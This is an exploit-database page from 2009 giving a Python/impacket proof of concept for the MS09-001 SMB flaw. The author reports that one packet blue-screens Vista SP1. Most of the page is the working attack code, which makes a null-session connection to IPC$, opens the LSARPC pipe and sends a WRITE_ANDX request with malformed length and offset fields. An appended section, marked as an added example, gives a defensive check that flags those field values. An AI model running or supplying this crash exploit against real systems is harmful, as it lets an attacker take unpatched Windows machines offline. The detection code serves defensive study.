MS09-001 SMB DoS PoC Exploit - vulnerability warning - the black bar safety net

2009-06-08T00:00:00
ID MYHACK58:62200923483
Type myhack58
Reporter Anonymous
Modified 2009-06-08T00:00:00

Description

Today I wrote an SMB DoS PoC in Python and tested it against Vista SP1. A single packet immediately causes a blue screen, but it does not work against XP SP2, because XP SP2 and below by default do not allow null sessions to access the lsarpc, samr and other named pipes.

MS09-001 SMB DoS Vulnerabilities PoC Exploit

Author : vessial

http://hi.baidu.com/vessial

Tod

[+] test vista sp1, system BSOD

Reference: http://www.microsoft.com/technet/security/Bulletin/MS09-001.mspx

http://www.milw0rm.com/exploits/6463

import impacket
from impacket import smb
from impacket import nmb

remote = smb.SMBPacket('')
r = smb.SMB('*SMBSERVER','192.168.40.129',None,nmb.TYPE_SERVER,445)
r._login('','','','WORKGROUP')
tid = r.tree_connect_andx('\\\\192.168.40.129\\IPC$')

smb1 = smb.NewSMBPacket()
smb1['Flags1'] = 0x18
smb1['Flags2'] = 0xc807
smb1['Tid'] = tid

ntCreate = smb.SMBCommand(smb.SMB.SMB_COM_NT_CREATE_ANDX)
ntCreate['Parameters'] = smb.SMBNtCreateAndX_Parameters()
ntCreate['Data'] = smb.SMBNtCreateAndX_Data()
ntCreate['Parameters']['FileNameLength'] = 14
ntCreate['Parameters']['AndXOffset'] = 0xdede
ntCreate['Parameters']['CreateFlags'] = 0x16
ntCreate['Parameters']['AccessMask'] = 0x2019f
ntCreate['Parameters']['CreateOptions'] = 0x400040
ntCreate['Parameters']['ShareAccess'] = 7
ntCreate['Parameters']['Impersonation'] = 2
ntCreate['Parameters']['Disposition'] = 1

ntCreate['Data'] = "\x00\\\x00L\x00S\x00A\x00R\x00P\x00C" + "\x00\x00"
smb1.addCommand(ntCreate)
r.sendSMB(smb1)

recv = r.recvSMB()
if recv.isValidAnswer(smb.SMB.SMB_COM_NT_CREATE_ANDX):
    ntCreateResponse = smb.SMBCommand(recv['Data'][0])
    ntCreateParameters = smb.SMBNtCreateAndXResponse_Parameters(ntCreateResponse['Parameters'])
    fid = ntCreateParameters['Fid']

smb1 = smb.NewSMBPacket()
smb1['Flags1'] = 0x18
smb1['Flags2'] = 0
smb1['Tid'] = tid
data = "A"*72

writeAndX = smb.SMBCommand(smb.SMB.SMB_COM_WRITE_ANDX)

smb1.addCommand(writeAndX)

writeAndX['Parameters'] = smb.SMBWriteAndX_Parameters()
writeAndX['Parameters']['Fid'] = fid
writeAndX['Parameters']['AndXOffset'] = 0xdede
writeAndX['Parameters']['Offset'] = 0
writeAndX['Parameters']['WriteMode'] = 8
writeAndX['Parameters']['Remaining'] = len(data)
writeAndX['Parameters']['_reserved'] = -1
writeAndX['Parameters']['DataLength'] = 0xffff
writeAndX['Parameters']['DataOffset'] = 0xffff
writeAndX['Parameters']['HighOffset'] = 0xcccccccc
writeAndX['Data'] = data
r.sendSMB(smb1)
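Added example, not part of the original PoC: a detection-side check for the inconsistency visible in the WRITE_ANDX request above, where DataLength and DataOffset are both 0xffff while only 72 bytes of data are sent. The function names check_write_andx and build_sample are hypothetical, the sample messages are constructed inline, and the input is assumed to be one SMB1 message with the NetBIOS session header already removed.

```python
import struct

SMB_COM_WRITE_ANDX = 0x2F
HEADER_LEN = 32  # fixed SMB1 header size

def check_write_andx(msg):
    """Findings for one SMB1 message (NetBIOS session header already stripped)."""
    if len(msg) < HEADER_LEN + 1 or msg[:4] != b"\xffSMB":
        return ["not an SMB1 message"]
    if msg[4] != SMB_COM_WRITE_ANDX or msg[9] & 0x80:
        return []  # a different command, or a server response
    word_count = msg[HEADER_LEN]
    words = msg[HEADER_LEN + 1:HEADER_LEN + 1 + 2 * word_count]
    if word_count not in (12, 14) or len(words) != 2 * word_count:
        return ["WRITE_ANDX with unexpected word count %d" % word_count]
    # AndXCommand, AndXReserved, AndXOffset, FID, Offset, Timeout, WriteMode,
    # Remaining, DataLengthHigh, DataLength, DataOffset
    fields = struct.unpack("<BBHHIIHHHHH", words[:24])
    len_high, data_len, data_off = fields[8:11]
    declared = (len_high << 16) | data_len
    params_end = HEADER_LEN + 1 + 2 * word_count + 2  # + ByteCount field
    findings = []
    if data_off < params_end:
        findings.append("DataOffset %#x points into the header/parameters" % data_off)
    if data_off + declared > len(msg):
        findings.append("declared data (%d bytes at %#x) runs past the %d-byte message"
                        % (declared, data_off, len(msg)))
    return findings

def build_sample(data, data_len, data_off):
    """Constructed fixture: SMB1 header plus a 14-word WRITE_ANDX request."""
    header = (b"\xffSMB" + bytes([SMB_COM_WRITE_ANDX]) + b"\x00" * 4
              + b"\x18" + b"\x00" * 22)
    words = struct.pack("<BBHHIIHHHHHI", 0xFF, 0, 0, 0x4000, 0, 0xFFFFFFFF,
                        8, len(data), 0, data_len, data_off, 0)
    return header + bytes([14]) + words + struct.pack("<H", len(data)) + data

if __name__ == "__main__":
    payload = b"A" * 72
    for name, msg in (("consistent", build_sample(payload, 72, 63)),
                      ("page's field values", build_sample(payload, 0xFFFF, 0xFFFF))):
        print(name, "->", check_write_andx(msg) or "ok")
```

The check only compares the declared data window with the bytes actually present; it makes no claim about the root cause inside the server driver.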